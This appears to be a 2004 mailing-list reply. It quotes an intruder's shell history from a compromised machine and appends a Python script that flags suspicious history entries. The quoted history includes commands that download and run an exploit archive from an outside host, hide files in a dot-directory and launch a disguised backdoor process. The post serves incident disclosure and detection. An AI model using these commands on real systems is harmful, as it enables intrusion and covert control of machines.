From: andrewg at felinemenace.org (andrewg@...inemenace.org)
Subject: Re: Automated SSH login attempts?

Greetings list,

Accidentally sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
> 

I got a similar experience from a game box I look after 
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @ 
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source IP addresses used for logging into guest, but that's
probably not overly useful.

Thanks,
Andrew Griffiths
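
Added example, not part of the original post: a small Python triage pass over a shell history file, run here on a subset of the .bash_history quoted above. The rule names, regexes and the BUILTINS set are assumptions made for this illustration, not a vetted signature set.

```python
import re

# Subset of the .bash_history quoted in the post (embedded so this runs offline).
HISTORY = """\
uname -a
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ls -alF
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
PATH='.:$PATH'
inetd -e -o
"""

# Heuristic rules: assumptions made for this example, not a vetted signature set.
RULES = [
    # download, unpack and execute chained on one line
    ("fetch-unpack-run",
     re.compile(r"\b(wget|curl|lynx|ncftpget)\b.*;.*\btar\b.*;.*\./\S+")),
    # dot-directory, which a plain `ls` does not list
    ("hidden-dir-created", re.compile(r"^\s*mkdir\s+(-\S+\s+)*\.[^./\s]\S*")),
    # archive deleted once unpacked
    ("archive-removed", re.compile(r"^\s*rm\s+-\w*f\w*\s+\S+\.(tgz|tar\.gz|tar)\b")),
    # current directory searched before (or instead of) the system directories
    ("dot-first-in-PATH", re.compile(r"^\s*(export\s+)?PATH=['\"]?\.(:|['\"]?$)")),
]
BUILTINS = {"cd", "echo", "export", "exit", "pwd"}  # never resolved through PATH

def triage(history):
    """Return (line_no, rule, command) for each suspicious history entry."""
    findings, dot_path = [], False
    for n, line in enumerate(history.splitlines(), 1):
        cmd = line.split()[0] if line.strip() else ""
        # With '.' first in PATH, a bare name such as `inetd` runs the file of
        # that name in the current directory, not the system binary.
        if dot_path and cmd and not set("/=") & set(cmd) and cmd not in BUILTINS:
            findings.append((n, "bare-command-after-dot-PATH", line))
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name, line))
                dot_path = dot_path or name == "dot-first-in-PATH"
    return findings

if __name__ == "__main__":
    for n, rule, cmd in triage(HISTORY):
        print(f"{n:>3}  {rule:<28} {cmd}")
```

Because the history line single-quotes the assignment, $PATH is not expanded, so the final `inetd` can only have come from the working directory; that is the entry the stateful rule flags.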

